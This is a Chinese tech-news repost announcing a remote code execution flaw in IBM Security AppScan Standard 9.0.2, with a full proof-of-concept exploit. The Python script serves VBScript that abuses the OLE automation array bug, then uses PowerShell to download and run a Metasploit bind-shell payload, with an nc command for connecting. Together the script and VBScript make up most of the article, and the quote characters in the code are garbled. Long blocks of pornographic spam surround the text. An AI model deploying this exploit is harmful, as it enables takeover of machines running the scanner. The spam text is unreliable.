精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

IBM Security AppScan 9.0.2遠程代碼執行漏洞(含POC)

安全
IBM Security AppScan Standard是美國IBM公司的一套Web應用的安全測試工具。該工具可在應用開發生命周期中進行自動化動態和靜態安全漏洞掃描。該漏洞基于Windows OLE自動化數組遠程代碼執行漏洞,遠程攻擊者可利用此漏洞執行任意代碼。

IBM Security AppScan Standard是美國IBM公司的一套Web應用的安全測試工具。該工具可在應用開發生命周期中進行自動化動態和靜態安全漏洞掃描。該漏洞基于Windows OLE自動化數組遠程代碼執行漏洞,遠程攻擊者可利用此漏洞執行任意代碼。

IBM Security AppScan 9.0.2遠程代碼執行漏洞(含POC)

視頻演示

漏洞POC

#!/usr/bin/pythonimport BaseHTTPServer, socket

### IBM Security AppScan Standard OLE Automation Array Remote Code Execution## Author: Naser Farhadi# Linkedin: http://ir.linkedin.com/pub/naser-farhadi/85/b3b/909## Date: 1 June 2015 # Version: <= 9.0.2 # Tested on: Windows 7## Exploit Based on MS14-064 CVE-2014-6332 http://www.exploit-db.com/exploits/35229/ # if you able to exploit IE then you can exploit appscan and acunetix ;)# This Python Script Will Start A Sample HTTP Server On Attacker Machine And Serves Exploit Code And# Metasploit windows/shell_bind_tcp Executable Payload## Usage:#       chmod +x appscan.py#       ./appscan.py## Video: http://youtu.be/hPs1zQaBLMU       ...#       nc 172.20.10.14 333##class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
    def do_GET(req):
        req.send_response(200)
        if req.path == "/payload.exe":
            req.send_header(,Content-type,, application/exe,)
            req.end_headers()
            exe = open("payload.exe", rb,)
            req.wfile.write(exe.read())
            exe.close()
        else:
            req.send_header(,Content-type,, text/html,)
            req.end_headers()
            req.wfile.write("""Please scan me!
                            <SCRIPT LANGUAGE="VBScript">
                            function runmumaa() 
                            On Error Resume Next
                            set shell=createobject("Shell.Application")
                            command="Invoke-Expression $(New-Object System.Net.WebClient).DownloadFile(,http://"""+socket.gethostbyname(socket.gethostname())+"""/payload.exe,,\
                            ,payload.exe,);$(New-Object -com Shell.Application).ShellExecute(,payload.exe,);"
                            shell.ShellExecute "powershell", "-Command " & command, "", "runas", 0
                            end function

                            dim   aa()
                            dim   ab()
                            dim   a0
                            dim   a1
                            dim   a2
                            dim   a3
                            dim   win9x
                            dim   intVersion
                            dim   rnda
                            dim   funclass
                            dim   myarray

                            Begin()

                            function Begin()
                              On Error Resume Next
                              info=Navigator.UserAgent

                              if(instr(info,"Win64")>0)   then
                                 exit   function
                              end if

                              if (instr(info,"MSIE")>0)   then 
                                         intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))   
                              else
                                 exit   function  
                                         
                              end if

                              win9x=0

                              BeginInit()
                              If Create()=True Then
                                 myarray=        chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
                                 myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)

                                 if(intVersion<4) then
                                     document.write("<br> IE")
                                     document.write(intVersion)
                                     runshellcode()                    
                                 else  
                                      setnotsafemode()
                                 end if
                              end if
                            end function

                            function BeginInit()
                               Randomize()
                               redim aa(5)
                               redim ab(5)
                               a0=13+17*rnd(6)
                               a3=7+3*rnd(5)
                            end function

                            function Create()
                              On Error Resume Next
                              dim i
                              Create=False
                              For i = 0 To 400
                                If Over()=True Then
                                ,   document.write(i)     
                                   Create=True
                                   Exit For
                                End If 
                              Next
                            end function

                            sub testaa()
                            end sub

                            function mydata()
                                On Error Resume Next
                                 i=testaa
                                 i=null
                                 redim  Preserve aa(a2)  
                              
                                 ab(0)=0
                                 aa(a1)=i
                                 ab(0)=6.36598737437801E-314

                                 aa(a1+2)=myarray
                                 ab(2)=1.74088534731324E-310  
                                 mydata=aa(a1)
                                 redim  Preserve aa(a0)  
                            end function 


                            function setnotsafemode()
                                On Error Resume Next
                                i=mydata()  
                                i=readmemo(i+8)
                                i=readmemo(i+16)
                                j=readmemo(i+&h134)  
                                for k=0 to &h60 step 4
                                    j=readmemo(i+&h120+k)
                                    if(j=14) then
                                          j=0          
                                          redim  Preserve aa(a2)             
                                 aa(a1+2)(i+&h11c+k)=ab(4)
                                          redim  Preserve aa(a0)  

                                 j=0 
                                          j=readmemo(i+&h120+k)   
                                     
                                           Exit for
                                       end if

                                next 
                                ab(2)=1.69759663316747E-313
                                runmumaa() 
                            end function

                            function Over()
                                On Error Resume Next
                                dim type1,type2,type3
                                Over=False
                                a0=a0+a3
                                a1=a0+2
                                a2=a0+&h8000000
                              
                                redim  Preserve aa(a0) 
                                redim   ab(a0)     
                              
                                redim  Preserve aa(a2)
                              
                                type1=1
                                ab(0)=1.123456789012345678901234567890
                                aa(a0)=10
                                      
                                If(IsObject(aa(a1-1)) = False) Then
                                   if(intVersion<4) then
                                       mem=cint(a0+1)*16             
                                       j=vartype(aa(a1-1))
                                       if((j=mem+4) or (j*8=mem+8)) then
                                          if(vartype(aa(a1-1))<>0)  Then    
                                             If(IsObject(aa(a1)) = False ) Then             
                                               type1=VarType(aa(a1))
                                             end if               
                                          end if
                                       else
                                         redim  Preserve aa(a0)
                                         exit  function

                                       end if 
                                    else
                                       if(vartype(aa(a1-1))<>0)  Then    
                                          If(IsObject(aa(a1)) = False ) Then
                                              type1=VarType(aa(a1))
                                          end if               
                                        end if
                                    end if
                                end if
                                          
                                
                                If(type1=&h2f66) Then         
                                      Over=True      
                                End If  
                                If(type1=&hB9AD) Then
                                      Over=True
                                      win9x=1
                                End If  

                                redim  Preserve aa(a0)          
                                    
                            end function

                            function ReadMemo(add) 
                                On Error Resume Next
                                redim  Preserve aa(a2)  
                              
                                ab(0)=0   
                                aa(a1)=add+4     
                                ab(0)=1.69759663316747E-313       
                                ReadMemo=lenb(aa(a1))  
                               
                                ab(0)=0    
                             
                                redim  Preserve aa(a0)
                            end function

                            </script>""")if __name__ == __main__,:
    sclass = BaseHTTPServer.HTTPServer
    server = sclass((socket.gethostbyname(socket.gethostname()), 80), RequestHandler)
    print "Http server started", socket.gethostbyname(socket.gethostname()), 80
    try:
        server.serve_forever()
    except KeyboardInterrupt:
        pass
    server.server_close()

 

責任編輯:藍雨淚 來源: FreeBuf
相關推薦

2012-11-30 10:29:47

2015-04-30 08:11:40

2012-08-05 16:57:13

2021-01-26 10:00:45

漏洞網絡安全網絡攻擊

2015-03-06 15:31:01

2019-05-15 15:20:01

微軟漏洞防護

2017-08-22 13:45:27

2011-08-04 13:53:04

2020-10-08 13:44:27

漏洞

2014-08-27 16:22:19

2014-09-12 17:47:36

2023-12-14 16:20:09

2013-07-11 09:25:49

2014-10-29 15:44:55

2017-06-15 17:28:36

2025-09-18 10:05:45

2015-06-18 10:49:31

2017-08-15 17:39:52

2013-05-22 10:28:19

2022-08-10 12:01:50

DrayTek路由器漏洞
點贊
收藏

51CTO技術棧公眾號

亚洲精品一区二区三区99| 亚洲老妇色熟女老太| www.黄在线观看| 懂色av一区二区| 日韩电影在线看| 欧美videos中文字幕| 亚洲国产精品视频一区| 久久精品国产成人av| 成人av综合网| 亚洲另类在线制服丝袜| 成人午夜小视频| 摸摸摸bbb毛毛毛片| 天堂网在线最新版www中文网| 国产精品一品视频| www.亚洲免费视频| 欧美精品性生活| 美女做暖暖视频免费在线观看全部网址91 | 亚洲国产精品人人做人人爽| 国产精自产拍久久久久久蜜 | 久久久久久久免费视频了| 欧美激情小视频| 少妇熟女视频一区二区三区 | 亚洲天堂av老司机| 国产在线精品自拍| 欧美三级视频网站| www.神马久久| 337p亚洲精品色噜噜狠狠| 亚洲一区二区自拍偷拍| 中文在线a天堂| 久久一级电影| 91麻豆精品国产无毒不卡在线观看 | 亚洲一区视频在线| 国产98在线|日韩| 亚洲国产精品久| 中文一区二区三区四区| 亚洲一区二区五区| 亚洲最新在线| 成人综合影院| 91免费国产在线| 国产成人精品视| 色偷偷男人天堂| 日韩成人一区| 亚洲精品美腿丝袜| 国产精品日韩高清| 成人午夜视频在线播放| 一区二区三区国产精华| 欧美不卡在线视频| 免费黄频在线观看| 影音先锋中文在线视频| 99久久精品免费观看| 国产国产精品人在线视| 日韩精品无码一区二区| 成人午夜av| 日韩欧美中文字幕精品| 久久无码高潮喷水| 色综合久久影院| 国产成人精品一区二区三区网站观看 | 97人摸人人澡人人人超一碰| 国产乡下妇女做爰| 亚洲午夜电影| 中文字幕亚洲综合| 性囗交免费视频观看| 一区在线影院| 亚洲国产色一区| 妞干网视频在线观看| 精品无人乱码| 国产精品一区二区不卡| 91九色蝌蚪成人| 日本精品一二区| 久久97超碰国产精品超碰| 国内精品一区二区三区| 日本成人免费视频| 久久蜜桃av| 欧美老女人在线视频| 人人妻人人澡人人爽| 日韩电影二区| 亚洲欧美在线免费| 日本不卡视频一区| 欧美日韩视频免费看| 亚洲成人午夜电影| 国产精品50p| 丝袜美腿av在线| 国产精品久久综合| 欧美一卡2卡3卡4卡无卡免费观看水多多| 中文字幕自拍偷拍| 国产呦萝稀缺另类资源| 国产精品久久久久久av福利软件| 动漫精品一区一码二码三码四码| 欧美三级伦理在线| 亚洲精品狠狠操| 熟妇女人妻丰满少妇中文字幕| 欧美精品日日操| 亚洲亚洲人成综合网络| 国产乱子夫妻xx黑人xyx真爽| 影音先锋在线播放| 黑人巨大精品欧美一区免费视频| 日韩久久久久久久久久久久| 爱啪啪综合导航| 亚洲狠狠爱一区二区三区| 国产青青在线视频| 国产社区精品视频| 欧美色图片你懂的| 亚洲黄色小视频在线观看| 年轻的保姆91精品| 日韩欧美中文字幕制服| 国精产品一区一区三区免费视频| 精品女人视频| 亚洲福利视频免费观看| 亚洲丝袜在线观看| 国产精品欧美日韩一区| 亚洲欧美日韩中文在线制服| 88av在线播放| 成人羞羞动漫| 欧亚精品中文字幕| 国产精品第六页| 日韩av一区二区三区| 国产精品久久久久99| 空姐吹箫视频大全| www.爱久久.com| 狠狠色狠狠色综合人人| 无套内谢的新婚少妇国语播放| 国产成人在线视频网址| 亚洲不卡1区| 国产毛片av在线| 欧美国产精品一区二区| 亚洲国产欧美不卡在线观看 | 国产欧美日韩在线一区二区| 欧美激情影音先锋| 精品人妻一区二区三区换脸明星| 国内一区二区视频| 91最新在线免费观看| 99久久99久久久精品棕色圆| 国产美女视频一区| 亚洲成人a**址| 日韩在线免费| 欧美日韩国产另类不卡| 亚洲视频在线不卡| 国产66精品| 久久这里只有精品视频首页| 国产精品7777| 国产精品18久久久久久vr| 亚洲一二三区精品| 国产91精品在线| 日韩午夜在线播放| 日韩欧美123区| 亚洲黄页一区| 国产成人a亚洲精品| 天堂网www中文在线| 中文字幕乱码久久午夜不卡| av动漫免费看| 要久久爱电视剧全集完整观看| 这里只有视频精品| 无码人妻精品一区二区50| 久国产精品韩国三级视频| 亚洲精品一区二区毛豆| 日本黄色一区| 日韩在线视频免费观看| 国产香蕉在线视频| 成人免费三级在线| 日本一区二区三区www| 亚洲妇女成熟| 国产一区二区三区免费视频| 免费在线观看av网址| 日韩精品久久理论片| 日韩女优中文字幕| 在线不卡日本v二区707| 精品成人私密视频| 欧美三级韩国三级日本三斤在线观看| 毛片av一区二区| 精品福利影视| 中文在线免费视频| 中文字幕亚洲欧美日韩2019| 国产又粗又大又爽| 国产视频一区不卡| 免费一级特黄特色毛片久久看| 精品三级av在线导航| 欧美中文字幕视频在线观看| porn亚洲| 日韩免费视频一区| 乱老熟女一区二区三区| 国产乱码精品一区二区三区忘忧草 | 日韩一区二区精品| 日韩欧美高清在线观看| 国产欧美综合在线观看第十页| 国产91沈先生在线播放| 人人网欧美视频| 久久久久九九九九| 欧洲免费在线视频| 亚欧色一区w666天堂| 在线视频一二区| 亚洲成人中文| 97人人干人人| 欧美大胆性生话| 久久久精品免费| 中文字幕无码乱码人妻日韩精品| 亚洲三级视频在线观看| v天堂中文在线| 久久激情五月激情| 欧美视频在线播放一区| 久久精品一区二区不卡| 国产日韩一区在线| ririsao久久精品一区| 日韩精品一区二区三区视频在线观看| 日本在线视频免费观看| 国产精品久久久久久妇女6080| 国产a级片免费观看| 欧美网色网址| 成人中文字幕在线观看| 高清全集视频免费在线| 欧美精品国产精品| 北条麻妃在线观看视频| 久久www免费人成看片高清| 妞干网在线视频观看| 日韩中文在线电影| 欧美极品色图| 婷婷激情一区| 高清亚洲成在人网站天堂| 麻豆影院在线观看| 欧美精品三级在线观看| 69成人免费视频| 亚洲第一福利一区| 四虎精品免费视频| 国产精品久久久久久久久久久免费看 | 亚洲欧美自偷自拍另类| 日韩在线中文| 日韩电影大全在线观看| 免费成人蒂法| 国产精品国产一区二区| 日韩激情综合| 高清欧美电影在线| 男女视频在线| 日韩不卡在线观看| 中文字幕一区二区人妻视频| 亚洲国产wwwccc36天堂| 岛国毛片在线观看| 亚洲精品国产视频| 丰满少妇被猛烈进入一区二区| 国产99精品在线观看| 亚洲午夜精品久久久久久人妖| 午夜精品久久99蜜桃的功能介绍| 国产精品制服诱惑| 51精品国产| 高清视频一区| av成人综合| 91黄在线观看| 成人自拍在线| 国产一区二区三区免费不卡| 国产私拍福利精品视频二区| 欧美一区二区三区精品电影| 午夜激情在线观看| 在线亚洲欧美视频| 69久久夜色| 日韩av中文字幕在线免费观看| 中文字幕在线视频第一页| 在线成人av网站| 亚洲国产综合网| 亚洲成人a级网| 日韩欧美在线番号| 国产一区二区三区免费视频| 在线观看美女网站大全免费| 色哟哟入口国产精品| 精精国产xxxx视频在线| 日韩精品一二三四区| 国产99999| 欧美日韩亚州综合| 国产一区二区三区成人| 欧美一区二区三区精品| 波多野结衣一区二区三区在线| 欧美系列一区二区| 在线观看国产亚洲| 亚洲自拍与偷拍| 天堂av免费在线| 一区二区三区日韩欧美| 日韩三级视频在线播放| 色欧美片视频在线观看在线视频| 久久影院一区二区| 国产精品传媒在线| 欧美精品一区二区成人| 精品久久久中文| 免费一级肉体全黄毛片| 激情懂色av一区av二区av| 亚洲大尺度在线观看| 欧美一激情一区二区三区| 亚洲欧美一区二区三| 中文字幕久精品免费视频| 黄页网站在线| 色综合久久久888| 免费看男女www网站入口在线| 欧美精品aaa| 日韩欧美精品电影| 成人在线视频网址| 欧美精品一区二区三区精品| 国产亚洲精品久久久久久久| 女主播福利一区| 人妻精品无码一区二区三区 | 嫩草在线视频| 97视频在线观看视频免费视频| 日本动漫同人动漫在线观看| 欧美在线视频一区| 欧美激情三级| 亚洲国产一区二区精品视频| 91久久午夜| 天美一区二区三区| 国产视频在线观看一区二区三区 | 色婷婷综合久色| 影音先锋亚洲天堂| 欧美一区二区三区四区视频| 男人的天堂av高清在线| 久久久久久久电影一区| 欧美日韩视频免费看| 欧美日韩在线一区二区三区| 狠色狠色综合久久| 视频区 图片区 小说区| 国产欧美一区二区三区网站| 久久9999久久免费精品国产| 欧美电影在线免费观看| jzzjzzjzz亚洲成熟少妇| 欧美一级bbbbb性bbbb喷潮片| 亚洲综合影院| 综合操久久久| 激情综合视频| 天堂av手机在线| 中文一区二区在线观看| 国产午夜无码视频在线观看| 亚洲第一男人天堂| 欧美伦理免费在线| 亚洲精品欧美一区二区三区| 欧美成人自拍| 自拍偷拍一区二区三区四区| 久久久www成人免费无遮挡大片| 日韩av在线播放观看| 亚洲变态欧美另类捆绑| 人人超在线公开视频| 18成人免费观看网站下载| 亚洲精品一二三区区别| 狠狠操狠狠干视频| 成人午夜私人影院| 久久中文免费视频| 91精品福利在线一区二区三区| 97在线观看免费观看高清| 国产盗摄xxxx视频xxx69| 国产一区二区精品福利地址| 一本久道中文无码字幕av| 国内成人免费视频| 日韩一区二区三区四区视频| 欧洲精品在线观看| 国产高清在线免费| 欧美成在线观看| 韩国美女久久| 91精品国自产在线观看| 欧美福利网址| 91超薄肉色丝袜交足高跟凉鞋| 久久精品无码一区二区三区| 国产综合精品视频| 亚洲天堂av电影| 成人国产精品一区二区免费麻豆| 少妇免费毛片久久久久久久久| 美女视频一区二区| 2一3sex性hd| 欧美日韩在线影院| 精品人妻一区二区三区换脸明星| 欧美成在线视频| 国产主播性色av福利精品一区| 激情五月宗合网| 欧美国产精品中文字幕| 国产女人高潮的av毛片| 欧美激情三级免费| 日韩一区二区三免费高清在线观看| 亚洲人成网站在线播放2019| 国产自产v一区二区三区c| 国产在线拍揄自揄拍无码视频| 亚洲精品电影久久久| 亚洲精品555| www.国产二区| www国产精品av| 一区二区久久精品66国产精品| 欧美极品第一页| 国产精品片aa在线观看| 免费黄频在线观看| 五月天久久比比资源色| 91精彩视频在线播放| 福利精品视频| 日本不卡视频在线| 国产午夜激情视频| 在线播放精品一区二区三区 | 91久久久免费一区二区| 黄色网在线免费观看| 极品尤物一区二区三区| 久久精品国产久精国产爱| 久久久久久久伊人| 日韩一中文字幕| 色婷婷综合久久久久久| 成人在线播放网址| 国产精品白丝av| 日日摸天天添天天添破| 欧美美最猛性xxxxxx| 精品国产一区二区三区久久久樱花| 久久精品一二三四| 欧洲国内综合视频| 国产ktv在线视频|